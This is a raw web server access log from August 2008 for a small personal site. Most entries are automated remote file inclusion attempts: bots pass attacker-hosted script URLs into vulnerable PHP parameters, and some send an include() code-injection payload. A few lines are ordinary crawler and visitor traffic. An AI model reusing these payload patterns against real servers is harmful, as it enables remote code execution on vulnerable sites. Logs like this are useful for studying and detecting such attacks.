83.17.61.114 - - [23/Aug/2008:19:00:13 -0500] "GET /logs/access_log.1206662400//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://geocities.com/kumpulan_surat_sephani/devil.txt????? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
72.248.189.82 - - [23/Aug/2008:19:01:07 -0500] "GET /logs//modules/projects/errors.php?error=http://paginas.terra.com.br/lazer/xfatalzinhox/id3.txt??? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
72.248.189.82 - - [23/Aug/2008:19:01:07 -0500] "GET //modules/projects/errors.php?error=http://paginas.terra.com.br/lazer/xfatalzinhox/id3.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
67.18.151.242 - - [23/Aug/2008:19:01:11 -0500] "GET /logs/mods_full/enewsletter.php?BG=http://www.hotelsunflower.it/images/zoom/splash.me.gif? HTTP/1.1" 404 314 "-""libwww-perl/5.810"
67.18.151.242 - - [23/Aug/2008:19:01:11 -0500] "GET /mods_full/enewsletter.php?BG=http://www.hotelsunflower.it/images/zoom/splash.me.gif? HTTP/1.1" 404 309 "-""libwww-perl/5.810"
72.248.189.82 - - [23/Aug/2008:19:01:15 -0500] "GET /logs//includes/db_adodb.php?baseDir=http://paginas.terra.com.br/lazer/xfatalzinhox/id3.txt??? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
72.248.189.82 - - [23/Aug/2008:19:01:16 -0500] "GET //includes/db_adodb.php?baseDir=http://paginas.terra.com.br/lazer/xfatalzinhox/id3.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
72.248.189.82 - - [23/Aug/2008:19:01:30 -0500] "GET /logs//includes/errors.php?error=http://paginas.terra.com.br/lazer/xfatalzinhox/id3.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
72.248.189.82 - - [23/Aug/2008:19:01:30 -0500] "GET //includes/errors.php?error=http://paginas.terra.com.br/lazer/xfatalzinhox/id3.txt??? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
207.58.167.158 - - [23/Aug/2008:19:02:34 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://auction.thinaironline.com/counter/id.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.65"
207.58.167.158 - - [23/Aug/2008:19:02:34 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://auction.thinaironline.com/counter/id.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.65"
72.248.189.82 - - [23/Aug/2008:19:03:44 -0500] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://paginas.terra.com.br/lazer/xfatalzinhox/id3.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
72.248.189.82 - - [23/Aug/2008:19:03:44 -0500] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://paginas.terra.com.br/lazer/xfatalzinhox/id3.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
64.22.89.194 - - [23/Aug/2008:19:03:59 -0500] "GET /logs//?custompluginfile[]=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 200 96475 "-""libwww-perl/5.812"
64.22.89.194 - - [23/Aug/2008:19:03:59 -0500] "GET /logs//?custompluginfile[]=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 200 96475 "-""libwww-perl/5.812"
64.22.89.194 - - [23/Aug/2008:19:03:59 -0500] "GET //?custompluginfile[]=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.812"
64.22.89.194 - - [23/Aug/2008:19:03:59 -0500] "GET //?custompluginfile[]=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.812"
207.58.167.158 - - [23/Aug/2008:19:04:54 -0500] "GET /logs/access_log.1214524800//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://auction.thinaironline.com/counter/id.txt?? HTTP/1.1" 404 346 "-""libwww-perl/5.65"
207.58.167.158 - - [23/Aug/2008:19:04:54 -0500] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://auction.thinaironline.com/counter/id.txt?? HTTP/1.1" 404 319 "-""libwww-perl/5.65"
207.58.167.158 - - [23/Aug/2008:19:04:54 -0500] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://auction.thinaironline.com/counter/id.txt?? HTTP/1.1" 404 324 "-""libwww-perl/5.65"
207.58.167.158 - - [23/Aug/2008:19:04:54 -0500] "GET /logs/access_log.1214179200//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://auction.thinaironline.com/counter/id.txt?? HTTP/1.1" 404 346 "-""libwww-perl/5.65"
64.22.89.194 - - [23/Aug/2008:19:07:08 -0500] "GET //?custompluginfile[]=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.812"
65.55.208.121 - - [23/Aug/2008:19:07:58 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.121 - - [23/Aug/2008:19:07:59 -0500] "GET /logs/access_log.1217721600 HTTP/1.1" 200 806724 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
217.20.113.117 - - [23/Aug/2008:19:11:48 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.tiibetinspanielit.fi/forum/ids.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
217.20.113.117 - - [23/Aug/2008:19:11:48 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.tiibetinspanielit.fi/forum/ids.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
67.18.151.242 - - [23/Aug/2008:19:13:13 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.hotelsunflower.it/images/zoom/splash.me.gif? HTTP/1.1" 404 315 "-""libwww-perl/5.810"
67.18.151.242 - - [23/Aug/2008:19:13:13 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.hotelsunflower.it/images/zoom/splash.me.gif? HTTP/1.1" 404 310 "-""libwww-perl/5.810"
67.18.151.242 - - [23/Aug/2008:19:14:03 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.hotelsunflower.it/images/zoom/splash.me.gif? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
67.18.151.242 - - [23/Aug/2008:19:14:03 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.hotelsunflower.it/images/zoom/splash.me.gif? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
74.6.8.121 - - [23/Aug/2008:19:14:13 -0500] "GET /logs/access_log.1209081600 HTTP/1.0" 200 138073 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
220.125.208.12 - - [23/Aug/2008:19:14:22 -0500] "GET /logs/access_log.1214524800//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://auction.thinaironline.com/counter/id.txt?? HTTP/1.1" 404 346 "-""libwww-perl/5.65"
220.125.208.12 - - [23/Aug/2008:19:14:22 -0500] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://auction.thinaironline.com/counter/id.txt?? HTTP/1.1" 404 319 "-""libwww-perl/5.65"
220.125.208.12 - - [23/Aug/2008:19:14:23 -0500] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://auction.thinaironline.com/counter/id.txt?? HTTP/1.1" 404 324 "-""libwww-perl/5.65"
220.125.208.12 - - [23/Aug/2008:19:15:23 -0500] "GET /logs/access_log.1214179200//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://auction.thinaironline.com/counter/id.txt?? HTTP/1.1" 404 346 "-""libwww-perl/5.65"
217.20.113.117 - - [23/Aug/2008:19:15:25 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.tiibetinspanielit.fi/forum/ids.txt?? HTTP/1.1" 404 315 "-""libwww-perl/5.79"
217.20.113.117 - - [23/Aug/2008:19:15:25 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.tiibetinspanielit.fi/forum/ids.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.79"
200.5.113.34 - - [23/Aug/2008:19:15:47 -0500] "GET /logs/access_log.1206230400//claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.gugn.ru/news/data/archives/arab.txt??? HTTP/1.1" 404 355 "-""libwww-perl/5.805"
200.5.113.34 - - [23/Aug/2008:19:15:48 -0500] "GET //claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.gugn.ru/news/data/archives/arab.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
200.5.113.34 - - [23/Aug/2008:19:15:49 -0500] "GET /logs//claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.gugn.ru/news/data/archives/arab.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
84.21.71.133 - - [23/Aug/2008:19:17:40 -0500] "GET /logs//convert/mvcw_conver.php?step=1&vwar_root=http://paginas.terra.com.br/lazer/xfatalzinhox/id3.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
84.21.71.133 - - [23/Aug/2008:19:17:40 -0500] "GET //convert/mvcw_conver.php?step=1&vwar_root=http://paginas.terra.com.br/lazer/xfatalzinhox/id3.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
64.22.89.194 - - [23/Aug/2008:19:23:12 -0500] "GET /logs/access_log.1214438400//?custompluginfile[]=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.812"
64.22.89.194 - - [23/Aug/2008:19:23:13 -0500] "GET //?custompluginfile[]=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.812"
64.22.89.194 - - [23/Aug/2008:19:23:13 -0500] "GET /logs//?custompluginfile[]=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 200 96475 "-""libwww-perl/5.812"
209.97.213.28 - - [23/Aug/2008:19:25:44 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.soaresdacosta.pt/readme.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
64.22.89.194 - - [23/Aug/2008:19:25:52 -0500] "GET /logs/access_log.1214179200//?custompluginfile[]=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.812"
207.58.167.158 - - [23/Aug/2008:19:27:15 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://auction.thinaironline.com/counter/id.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.65"
207.58.167.158 - - [23/Aug/2008:19:27:15 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://auction.thinaironline.com/counter/id.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.65"
64.22.89.194 - - [23/Aug/2008:19:28:44 -0500] "GET /bbs//include/bbs.lib.inc.php?site_path=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.812"
64.22.89.194 - - [23/Aug/2008:19:28:45 -0500] "GET /logs/bbs//include/bbs.lib.inc.php?site_path=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.812"
64.22.89.194 - - [23/Aug/2008:19:28:45 -0500] "GET /logs/bbs//include/bbs.lib.inc.php?site_path=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.812"
64.22.89.194 - - [23/Aug/2008:19:28:45 -0500] "GET /bbs//include/bbs.lib.inc.php?site_path=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.812"
64.22.89.194 - - [23/Aug/2008:19:28:45 -0500] "GET /bbs//include/bbs.lib.inc.php?site_path=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.812"
64.22.89.194 - - [23/Aug/2008:19:29:00 -0500] "GET /logs/access_log.1211500800/bbs//include/bbs.lib.inc.php?site_path=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 339 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
64.22.89.194 - - [23/Aug/2008:19:29:00 -0500] "GET /bbs//include/bbs.lib.inc.php?site_path=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 312 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
64.22.89.194 - - [23/Aug/2008:19:29:06 -0500] "GET /logs/bbs//include/bbs.lib.inc.php?site_path=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.812"
64.22.89.194 - - [23/Aug/2008:19:29:06 -0500] "GET /logs/bbs//include/bbs.lib.inc.php?site_path=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.812"
64.22.89.194 - - [23/Aug/2008:19:29:06 -0500] "GET /bbs//include/bbs.lib.inc.php?site_path=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.812"
64.22.89.194 - - [23/Aug/2008:19:29:06 -0500] "GET /bbs//include/bbs.lib.inc.php?site_path=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.812"
64.22.89.194 - - [23/Aug/2008:19:29:17 -0500] "GET /logs/access_log.1211500800/bbs//include/bbs.lib.inc.php?site_path=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.812"
64.22.89.194 - - [23/Aug/2008:19:29:17 -0500] "GET /bbs//include/bbs.lib.inc.php?site_path=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.812"
64.22.89.194 - - [23/Aug/2008:19:29:17 -0500] "GET /logs/bbs//include/bbs.lib.inc.php?site_path=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.812"
64.22.89.194 - - [23/Aug/2008:19:29:47 -0500] "GET /logs/access_log.1211500800/bbs//include/bbs.lib.inc.php?site_path=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 339 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
64.22.89.194 - - [23/Aug/2008:19:29:48 -0500] "GET /bbs//include/bbs.lib.inc.php?site_path=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 312 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
64.22.89.194 - - [23/Aug/2008:19:30:48 -0500] "GET /logs/access_log.1211500800/bbs//include/bbs.lib.inc.php?site_path=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.812"
64.22.89.194 - - [23/Aug/2008:19:30:48 -0500] "GET /bbs//include/bbs.lib.inc.php?site_path=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.812"
64.22.89.194 - - [23/Aug/2008:19:30:48 -0500] "GET /logs/bbs//include/bbs.lib.inc.php?site_path=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.812"
67.18.151.242 - - [23/Aug/2008:19:31:59 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.hotelsunflower.it/images/zoom/splash.me.gif? HTTP/1.1" 404 325 "-""libwww-perl/5.810"
67.18.151.242 - - [23/Aug/2008:19:31:59 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.hotelsunflower.it/images/zoom/splash.me.gif? HTTP/1.1" 404 320 "-""libwww-perl/5.810"
83.17.61.114 - - [23/Aug/2008:19:32:30 -0500] "GET /logs/access_log.1206230400//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.geocities.com/kumpulan_surat_sephani/devil.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
83.17.61.114 - - [23/Aug/2008:19:32:30 -0500] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.geocities.com/kumpulan_surat_sephani/devil.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
83.17.61.114 - - [23/Aug/2008:19:32:31 -0500] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.geocities.com/kumpulan_surat_sephani/devil.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
69.94.70.15 - - [23/Aug/2008:19:35:19 -0500] "GET /logs/errors.php?error=http://warsector.ru/access2006.log??? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
69.94.70.15 - - [23/Aug/2008:19:35:19 -0500] "GET /errors.php?error=http://warsector.ru/access2006.log??? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
72.29.68.128 - - [23/Aug/2008:19:36:29 -0500] "GET /logs/access_log.1206230400//?path%5Bdocroot%5D=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 312 "-""libwww-perl/5.810"
72.29.68.128 - - [23/Aug/2008:19:36:29 -0500] "GET //?path%5Bdocroot%5D=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 200 1243 "-""libwww-perl/5.810"
72.29.68.128 - - [23/Aug/2008:19:36:29 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 200 96475 "-""libwww-perl/5.810"
199.247.233.61 - - [23/Aug/2008:19:36:31 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
199.247.233.61 - - [23/Aug/2008:19:36:31 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://en.wikipedia.org/wiki/Flash_(tattoo)""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
199.247.233.61 - - [23/Aug/2008:19:36:31 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
199.247.233.61 - - [23/Aug/2008:19:36:31 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
199.247.233.61 - - [23/Aug/2008:19:36:39 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2676 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
199.247.233.61 - - [23/Aug/2008:19:36:39 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
199.247.233.61 - - [23/Aug/2008:19:36:39 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
199.247.233.61 - - [23/Aug/2008:19:36:40 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
199.247.233.61 - - [23/Aug/2008:19:36:40 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
199.247.233.61 - - [23/Aug/2008:19:36:40 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
199.247.233.61 - - [23/Aug/2008:19:36:40 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
199.247.233.61 - - [23/Aug/2008:19:36:40 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
199.247.233.61 - - [23/Aug/2008:19:36:40 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
199.247.233.61 - - [23/Aug/2008:19:36:40 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
199.247.233.61 - - [23/Aug/2008:19:36:40 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
74.6.31.166 - - [23/Aug/2008:19:37:07 -0500] "GET / HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! DE Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.29.68.128 - - [23/Aug/2008:19:37:41 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 200 96475 "-""libwww-perl/5.810"
72.29.68.128 - - [23/Aug/2008:19:37:41 -0500] "GET //?path%5Bdocroot%5D=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 200 1243 "-""libwww-perl/5.810"
64.22.89.194 - - [23/Aug/2008:19:38:48 -0500] "GET /poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.812"
72.29.68.128 - - [23/Aug/2008:19:38:49 -0500] "GET //?path%5Bdocroot%5D=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 200 1243 "-""libwww-perl/5.810"
67.18.151.242 - - [23/Aug/2008:19:40:27 -0500] "GET /logs/modules/blog.php?tmp=http://www.hotelsunflower.it/images/zoom/splash.me.gif? HTTP/1.1" 404 305 "-""libwww-perl/5.810"
67.18.151.242 - - [23/Aug/2008:19:40:27 -0500] "GET /modules/blog.php?tmp=http://www.hotelsunflower.it/images/zoom/splash.me.gif? HTTP/1.1" 404 300 "-""libwww-perl/5.810"
200.150.189.10 - - [23/Aug/2008:19:41:01 -0500] "GET /logs/access_log.1213401600//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.tes2008.kit.net/id.txt?%0D?? HTTP/1.1" 404 347 "-""libwww-perl/5.76"
200.150.189.10 - - [23/Aug/2008:19:41:01 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.tes2008.kit.net/id.txt?%0D?? HTTP/1.1" 404 325 "-""libwww-perl/5.76"
64.22.89.194 - - [23/Aug/2008:19:41:07 -0500] "GET /logs/poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.812"
64.22.89.194 - - [23/Aug/2008:19:41:08 -0500] "GET /poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.812"
64.22.89.194 - - [23/Aug/2008:19:41:18 -0500] "GET /logs/poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.812"
64.22.89.194 - - [23/Aug/2008:19:41:19 -0500] "GET /poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.812"
91.121.4.30 - - [23/Aug/2008:19:44:37 -0500] "GET /logs/access_log.1214179200/errors.php?error=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
77.91.224.3 - - [23/Aug/2008:19:44:38 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)"
77.91.224.3 - - [23/Aug/2008:19:44:38 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 4913 "-""WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)"
91.121.4.30 - - [23/Aug/2008:19:45:16 -0500] "GET /logs/access_log.1213488000/errors.php?error=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
89.208.43.121 - - [23/Aug/2008:19:51:01 -0500] "GET //errors.php?error=http://www.arisukoyu.org.tr/forum/Smileys/v6id.txt? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
72.29.68.128 - - [23/Aug/2008:19:54:42 -0500] "GET /logs/access_log.1214524800//?path%5Bdocroot%5D=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 312 "-""libwww-perl/5.810"
209.51.155.138 - - [23/Aug/2008:19:55:10 -0500] "GET /logs/access_log.1214179200/errors.php?error=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 321 "-""libwww-perl/5.813"
84.21.71.133 - - [23/Aug/2008:19:55:43 -0500] "GET /logs/access_log.1208044800/admin/editor2/errors.php?error=http://paginas.terra.com.br/lazer/xfatalzinhox/id3.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
84.21.71.133 - - [23/Aug/2008:19:55:43 -0500] "GET /logs/admin/editor2/errors.php?error=http://paginas.terra.com.br/lazer/xfatalzinhox/id3.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
84.21.71.133 - - [23/Aug/2008:19:55:43 -0500] "GET /admin/editor2/errors.php?error=http://paginas.terra.com.br/lazer/xfatalzinhox/id3.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
209.51.155.138 - - [23/Aug/2008:19:55:50 -0500] "GET /logs/access_log.1213488000/errors.php?error=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 321 "-""libwww-perl/5.813"
77.91.224.3 - - [23/Aug/2008:19:57:29 -0500] "GET /costume/ HTTP/1.1" 200 640 "-""WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)"
74.6.8.121 - - [23/Aug/2008:19:59:39 -0500] "GET /logs/access_log.1181001600 HTTP/1.0" 200 198429 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.156 - - [23/Aug/2008:20:02:20 -0500] "GET /?N=D HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
64.22.89.194 - - [23/Aug/2008:20:03:50 -0500] "GET /logs/language/lang_german/lang_main_album.php?phpbb_root_path=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 329 "-""libwww-perl/5.812"
64.22.89.194 - - [23/Aug/2008:20:03:51 -0500] "GET /language/lang_german/lang_main_album.php?phpbb_root_path=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 324 "-""libwww-perl/5.812"
64.22.89.194 - - [23/Aug/2008:20:03:51 -0500] "GET /logs/language/lang_german/lang_main_album.php?phpbb_root_path=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 329 "-""libwww-perl/5.812"
